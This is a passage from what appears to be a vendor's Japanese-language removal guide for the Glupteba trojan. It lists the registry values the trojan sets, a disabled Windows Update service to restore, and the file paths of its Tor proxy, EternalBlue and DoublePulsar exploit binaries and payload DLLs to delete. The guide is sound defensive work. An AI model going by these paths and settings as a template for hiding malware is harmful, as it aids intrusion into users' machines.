- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- VC = {value}
- VC = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- OSCaption = {Operating System of affected machine}
- OSCaption = {Operating System of affected machine}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- OSArchitecture = {32 or 64}
- OSArchitecture = {32 or 64}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- IsAdmin = {value}
- IsAdmin = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- AV = {strings}
- AV = {strings}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- PatchTime = {value}
- PatchTime = {value}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- CPU = {CPU details of affected machine}
- CPU = {CPU details of affected machine}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- GPU = {GPU details of affected machine}
- GPU = {GPU details of affected machine}
- In HKEY_CURRENT_USER\Software\Microsoft\TestApp
- Firewall = {string}
- Firewall = {string}
手順 6
変更されたレジストリ値を修正します。
警告:レジストリはWindowsの構成情報が格納されているデータベースであり、レジストリの編集内容に問題があると、システムが正常に動作しなくなる場合があります。
事前に意図的に対象の設定を変更していた場合は、意図するオリジナルの設定に戻してください。変更する値が分からない場合は、システム管理者にお尋ねいただき、レジストリの編集はお客様の責任として行なって頂くようお願いいたします。弊社ではレジストリの編集による如何なる問題に対しても補償いたしかねます。
レジストリの編集前にこちらをご参照ください。
- In HKEY_LOCAL_MACHINE\CurrentControlSet\services\wuauserv
- From: Start = 4
To: Start = (usually 2)
- From: Start = 4
手順 8
以下のファイルを検索し削除します。
- %System%\drivers\winmon.sys
- %System%\drivers\WinmonFS.sys
- %System%\drivers\WinmonProcessMonitor.sys
- %User temp%\wup\wup.exe
- %User temp%\wup\wupv.exe
- %User Temp%\csrss\scheduled.exe
- %User Temp%\csrss\cloudnet.exe
- %User temp%\csrss\vc.exe
- %Windows%\windefender.exe
- %User Temp%\csrss\proxy\config
- %User Temp%\csrss\proxy\libeay32.dll
- %User Temp%\csrss\proxy\libevent-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_core-2-0-5.dll
- %User Temp%\csrss\proxy\libevent_extra-2-0-5.dll
- %User Temp%\csrss\proxy\libgcc_s_sjlj-1.dll
- %User Temp%\csrss\proxy\libssp-0.dll
- %User Temp%\csrss\proxy\obfs4proxy.exe
- %User Temp%\csrss\proxy\ssleay32.dll
- %User Temp%\csrss\proxy\tor-gencert.exe
- %User Temp%\csrss\proxy\tor.exe
- %User Temp%\csrss\proxy\zlib1.dll
- %User Temp%\csrss\smb\adfw-2.dll
- %User Temp%\csrss\smb\adfw.dll
- %User Temp%\csrss\smb\cnli-0.dll
- %User Temp%\csrss\smb\cnli-1.dll
- %User Temp%\csrss\smb\coli-0.dll
- %User Temp%\csrss\smb\crli-0.dll
- %User Temp%\csrss\smb\dmgd-1.dll
- %User Temp%\csrss\smb\dmgd-4.dll
- %User Temp%\csrss\smb\Doublepulsar-1.3.1.exe
- %User Temp%\csrss\smb\esco-0.dll
- %User Temp%\csrss\smb\Eternalblue-2.2.0.exe
- %User Temp%\csrss\smb\exma-1.dll
- %User Temp%\csrss\smb\exma.dll
- %User Temp%\csrss\smb\iconv.dll
- %User Temp%\csrss\smb\libcurl.dll
- %User Temp%\csrss\smb\libeay32.dll
- %User Temp%\csrss\smb\libiconv-2.dll
- %User Temp%\csrss\smb\libxml2.dll
- %User Temp%\csrss\smb\payload32.dll
- %User Temp%\csrss\smb\payload64.dll
- %User Temp%\csrss\smb\pcla-0.dll
- %User Temp%\csrss\smb\pcre-0.dll
- %User Temp%\csrss\smb\pcrecpp-0.dll
- %User Temp%\csrss\smb\pcreposix-0.dll
- %User Temp%\csrss\smb\posh-0.dll
- %User Temp%\csrss\smb\posh.dll
- %User Temp%\csrss\smb\pytrch.py
- %User Temp%\csrss\smb\pytrch.pyc
- %User Temp%\csrss\smb\riar-2.dll
- %User Temp%\csrss\smb\riar.dll
- %User Temp%\csrss\smb\ssleay32.dll
- %User Temp%\csrss\smb\tibe-1.dll
- %User Temp%\csrss\smb\tibe-2.dll
- %User Temp%\csrss\smb\tibe.dll
- %User Temp%\csrss\smb\trch-0.dll
- %User Temp%\csrss\smb\trch-1.dll
- %User Temp%\csrss\smb\trch.dll
- %User Temp%\csrss\smb\trfo-0.dll
- %User Temp%\csrss\smb\trfo-2.dll
- %User Temp%\csrss\smb\trfo.dll
- %User Temp%\csrss\smb\tucl-1.dll
- %User Temp%\csrss\smb\tucl.dll
- %User Temp%\csrss\smb\ucl.dll
- %User Temp%\csrss\smb\xdvl-0.dll
- %User Temp%\csrss\smb\zibe.dll
- %User Temp%\csrss\smb\zlib1.dll
- %User Temp%\csrss\smb\_pytrch.pyd
手順 9
以下のフォルダを検索し削除します。
- %User Temp%\csrss
- %Windows%\rss
手順 10
コンピュータを通常モードで再起動し、最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、「TROJ_GLUPTEBA.JMZ」と検出したファイルの検索を実行してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 11
以下の修正パッチをダウンロードし適用します。この脆弱性に対する修正パッチを適用するまで、該当製品の使用をお控えください。この製品の製造元が公開する正式な修正パッチをダウンロードし適用することをお勧めします。
ご利用はいかがでしたか? アンケートにご協力ください